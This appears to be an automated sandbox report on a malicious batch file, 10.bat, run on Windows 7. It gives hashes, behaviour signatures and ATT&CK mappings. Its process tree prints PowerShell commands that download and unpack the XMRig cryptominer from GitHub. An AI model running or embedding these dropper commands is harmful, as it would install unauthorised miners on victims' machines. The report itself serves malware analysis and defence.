Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 02:54

General

  • Target

    10.bat

  • Size

    599B

  • MD5

    798b979417aa88e5323ead9be2d8425c

  • SHA1

    a54c5133c71afddf697f302b36bdb930c72852ce

  • SHA256

    f83d724987f9f4a0843c0b0abd01f3f5ceccbc8e7babad76c2639e1bef2fee07

  • SHA512

    a4f2ff598bc26b5ee7778b34b34aafd20e43f714c5f841b9fe73cdc6e1c3e47e44ffb94ff06ccd7dd263116201ff6754c956c1ea8f588acf6927f35446b5036b

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\10.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1792
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip', 'xmrig-6.21.3-msvc-win64.zip')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2184
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Path 'xmrig-6.21.3-msvc-win64.zip' -DestinationPath '.'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2688

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A9IB2ZI4N8T7MC834RFE.temp
    Filesize

    7KB

    MD5

    d7cf367627a225e58d29c951bb6627f0

    SHA1

    88f0716d4347ccdebd9075c0d008736dc68e9c96

    SHA256

    e5e19e6b45644b174adb979e456c4f7994d16fd07482e570bf21966b17567dc4

    SHA512

    a08176752730712e3eb320661b26ceb17c1b63de2700c27c74d102adf2b7a2d6c884b260ea7d28874f81fcde17c9f4a54806993f86b2fb87a045c736608e8d90

  • memory/2184-4-0x000007FEF639E000-0x000007FEF639F000-memory.dmp
    Filesize

    4KB

  • memory/2184-5-0x000000001B850000-0x000000001BB32000-memory.dmp
    Filesize

    2.9MB

  • memory/2184-6-0x0000000001F40000-0x0000000001F48000-memory.dmp
    Filesize

    32KB

  • memory/2184-7-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp
    Filesize

    9.6MB

  • memory/2184-8-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp
    Filesize

    9.6MB

  • memory/2184-9-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp
    Filesize

    9.6MB

  • memory/2184-10-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp
    Filesize

    9.6MB

  • memory/2184-11-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp
    Filesize

    9.6MB

  • memory/2184-12-0x000007FEF60E0000-0x000007FEF6A7D000-memory.dmp
    Filesize

    9.6MB

  • memory/2688-19-0x0000000001E70000-0x0000000001E78000-memory.dmp
    Filesize

    32KB

  • memory/2688-18-0x000000001B5C0000-0x000000001B8A2000-memory.dmp
    Filesize

    2.9MB